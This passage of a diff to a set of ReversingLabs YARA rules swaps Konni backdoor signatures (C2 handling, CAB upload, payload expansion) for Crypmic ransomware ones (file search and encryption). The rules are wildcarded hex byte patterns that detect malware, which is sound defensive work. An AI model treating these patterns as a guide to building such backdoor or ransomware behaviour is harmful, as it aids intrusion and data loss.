+            ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 39
+            ?? ?? ?? ?? 06 08 9A 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F
+            ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 2F ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
+            18 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ??
+            28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1A 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A
+            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 2C ?? 16 0B 02 72 ?? ?? ?? ?? 7E ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 08 17 58 0C 08 06 8E
+            69 3F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ??
+            11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 2A
         }
-		$check_license_expiration_date = {
-            55 8B EC 83 E4 ?? 83 EC ?? 57 33 C0 66 89 44 24 ?? 83 64 24 ?? ?? 8D 7C 24 ?? AB AB
-            AB 66 AB 33 C0 66 89 44 24 ?? 8D 7C 24 ?? AB AB AB 66 AB 33 C0 21 44 24 ?? 8D 7C 24
-            ?? AB 8D 7C 24 ?? AB 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 8D
-            4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ??
-            8B 44 24 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ??
-            8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 3B 44 24 ?? 72 ?? 77 ??
-            8B 44 24 ?? 3B 44 24 ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 8B E5 5D C3
+		$setup_env = {
+            28 ?? ?? ?? ?? 2C ?? 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+            ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+            ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 2C ??
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ??
+            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2D ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $resolve_windows_api ) and ( $load_sqlite3_functions ) and ( $check_license_expiration_date )
+		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
 }
-rule REVERSINGLABS_Win32_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Crypmic : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Konni backdoor."
+		description = "Yara rule that detects Crypmic ransomware."
 		author = "ReversingLabs"
-		id = "6fe230b1-357a-54f7-a9a8-15d0369fec71"
-		date = "2023-12-07"
-		modified = "2023-12-07"
+		id = "0d5c2141-c0ca-53c8-91fd-ec2d5f163df2"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win32.Backdoor.Konni.yara#L1-L190"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Crypmic.yara#L1-L56"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7907a657d804d485718ba13bb23513de0b909e7d455c2b3ee193b5329edd3ac6"
+		logic_hash = "ee97c4d35cee68e080a4e9e0a21ecd3698da638463881a58f5daaf906ef86f75"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Konni"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Crypmic"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$network_communication_p1 = {
-            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ?? ?? 8D 9E ?? ?? ?? ??
-            57 53 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 45 ??
-            50 56 8D 8E ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
-            81 C6 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 57 57 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF
-            0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 6A ?? 56 53 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B F8 89 7D ?? 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8D 47 ?? 5F 5E 5B 8B E5 5D C2 ??
-            ?? 8B 55 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 57 C7 45 ?? ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8B 35 ?? ?? ?? ?? 57 FF D6 53 FF D6 5F
-            5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
-            6A ?? 6A ?? 85 C0 74 ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 6A ?? 56
-            FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E B8 ?? ?? ?? ??
-            5B 8B E5 5D C2 ?? ?? 8B 45 ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ??
-            ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 40 50 6A ?? 89
+		$search_and_encrypt_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? 57 8B F9 89 7D ?? C7 45 ?? ?? ?? ??
+            ?? 89 45 ?? 8D 50 ?? 68 ?? ?? ?? ?? 6A ?? FF 77 ?? 66 89 85 ?? ?? ?? ?? 8B 47 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D0 66 8B 95 ?? ?? ?? ?? 33 F6 33
+            C9 89 45 ?? 66 3B F2 74 ?? 0F B7 D2 41 66 89 14 06 8D 34 09 33 DB 0F B7 94 35 ?? ??
+            ?? ?? 66 3B DA 75 ?? BA ?? ?? ?? ?? 66 89 14 48 8D 1C 48 8D 8D ?? ?? ?? ?? 51 C7 43
+            ?? ?? ?? ?? ?? 50 8B 47 ?? FF D0 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ??
+            ?? 74 ?? 66 8B 8D ?? ?? ?? ?? 66 83 F9 ?? 74 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 33 D2
+            33 C0 66 3B D1 74 ?? 0F B7 C9 8B FF 40 66 89 4C 1A ?? 8D 14 00 C7 45 ?? ?? ?? ?? ??
+            0F B7 8C 15 ?? ?? ?? ?? 66 39 4D ?? 75 ?? 8B 55 ?? 33 C9 66 89 4C 43 ?? 68 ?? ?? ??
+            ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 01 45 ?? 8D 85 ?? ?? ?? ?? 50 8B 47 ?? 56 FF D0 85
+            C0 75 ?? 8B 47 ?? 56 FF D0 8D 85 ?? ?? ?? ?? 50 FF 75 ?? C7 43 ?? ?? ?? ?? ?? 8B 47
         }
-		$network_communication_p2 = {
-            45 ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ??
-            ?? ?? ?? FF D6 8B 4D ?? 51 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55
-            ?? 52 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 6A ??
-            56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 45 ?? 50 FF D6 53 FF D6 5F 5E 83
-            C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55 ?? 8D 4D ?? 51 52 57 56 FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 B8 ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 83 F8 ?? 74 ?? 8B 4D ?? 8B 55 ?? 6A ??
-            8D 45 ?? 50 51 57 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 01 45 ?? 51 6A ?? 57 E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C4 ?? 8D 55 ?? 52 50 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D
-            ?? 51 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
-            56 8B 35 ?? ?? ?? ?? FF D6 8B 55 ?? 52 FF D6 53 FF D6 83 7D ?? ?? 0F 84 ?? ?? ?? ??
-            8B 45 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$handle_c2_commands_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85 ?? ?? ?? ??
-            50 33 FF 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ??
-            3B F7 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 0D ?? ??
-            ?? ?? 8B 16 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            4E ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 56 ?? 68 ?? ?? ?? ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B
-            5E ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 57 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 56 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
-        }
-		$handle_c2_commands_p2 = {
-            C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4C 86 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? BE
-            ?? ?? ?? ?? 85 C0 75 ?? 8D 78 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33
-            FF E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 52 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
-            44 96 ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 68
-            ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 06 8D 50 ?? 8B FF 66 8B 08 83
-            C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 57 8D 3C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? 8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 6A ?? 8D 3C 45 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? A1 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 50
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 56
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$create_cab_file_and_upload_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 56 57 33
-            FF 68 ?? ?? ?? ?? 8B F1 8D 95 ?? ?? ?? ?? 33 C9 57 52 89 85 ?? ?? ?? ?? 89 BD ?? ??
-            ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89
-            85 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 33 D2 50 66 89 95 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 0F B7 8D ?? ?? ?? ?? 0F B7 95 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 51 0F B7 8D ??
-            ?? ?? ?? 52 0F B7 95 ?? ?? ?? ?? 50 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 57 68 ?? ?? ?? ?? 8B C8 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52
-            FF 15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
-            68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ??
-            ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B CE 8D BD ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 F8 ?? 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 8D
-        }
-		$create_cab_file_and_upload_p2 = {
-            85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 33 FF 8D 9D ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74 ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ??
-            ?? 8B B5 ?? ?? ?? ?? 83 C6 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74
-            ?? 56 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 3B
-            DF 74 ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 3B
-            CF 75 ?? 2B C2 8D 93 ?? ?? ?? ?? D1 F8 8D 0C 00 33 C0 89 02 89 42 ?? 89 42 ?? 89 42
-            ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 3B CF 74 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8B CB EB ?? 33 C9 8B 95 ?? ?? ?? ?? 89 8A ?? ?? ?? ?? 3B CF 0F 84 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 8B 87 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 C7 87 ??
-            ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 9B ?? ?? ?? ??
-            66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 84 46 ?? ?? ?? ?? 50 6A ?? 89 85 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ??
-            53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 50
-            53 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 51 03 C3 50 E8 ?? ?? ?? ??
-            8B BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 FB 83 C4 ?? 03 FE B9 ?? ?? ?? ?? BE ?? ?? ??
-            ?? 50 F3 A5 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8
-        }
-		$create_cab_file_and_upload_p3 = {
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 81 C6 ?? ?? ?? ??
-            6A ?? 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 50 05 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B F0 85 F6 75 ?? 8B 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 52 FF D6 57 FF D6 B8 ?? ??
-            ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 53 6A
-            ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56
-            8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B
-            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 95 ??
-            ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35
-            ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D
-            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15
-            ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 83 C8
-        }
-		$create_cab_file_and_upload_p4 = {
-            5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 40 50 6A ?? 89 85 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ??
-            FF D6 8B 95 ?? ?? ?? ?? 52 FF D6 57 FF D6 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 6A ?? 53 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83
-            C4 ?? 8D 8D ?? ?? ?? ?? 51 52 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ??
-            ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 8B 4D ?? 8B 85 ?? ?? ?? ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$cmd_expand_payload = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 8B
-            D9 33 FF 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 33 D2 57 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D
-            ?? ?? ?? ?? 57 51 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ??
-            57 6A ?? 33 C0 68 ?? ?? ?? ?? 53 89 BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 57 57 57 6A ?? 57 56 FF
-            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 75 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? 5F 5E 5B
-            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 57 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F8
-            85 FF 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 47 ?? 50 6A ?? 6A ?? FF 15
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 57 ?? 83 C4 ?? 57 89 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 3D ?? ?? ?? ?? 50 FF D7 56 FF D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
-            51 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 33 C0 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 50 50 68 ?? ?? ?? ?? 50
-            50 50 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 6A
-            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8B F0 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF D7 8B 4D ?? 8B 85 ?? ??
-            ?? ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+		$search_and_encrypt_2 = {
+            33 F6 89 75 ?? FF D0 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ??
+            F6 85 ?? ?? ?? ?? ?? 75 ?? 66 8B BD ?? ?? ?? ?? 33 F6 8B 8E ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 83 FF ?? 75 ??
+            EB ?? 8D 9B ?? ?? ?? ?? 66 8B 48 ?? 83 C0 ?? 83 C2 ?? 66 3B 0A 74 ?? 66 83 38 ?? 0F
+            85 ?? ?? ?? ?? 66 83 3A ?? 0F 85 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? 8B 7D
+            ?? 8B 75 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 50 8B 47 ?? FF D0 85 C0 8B 45 ?? 0F 85 ??
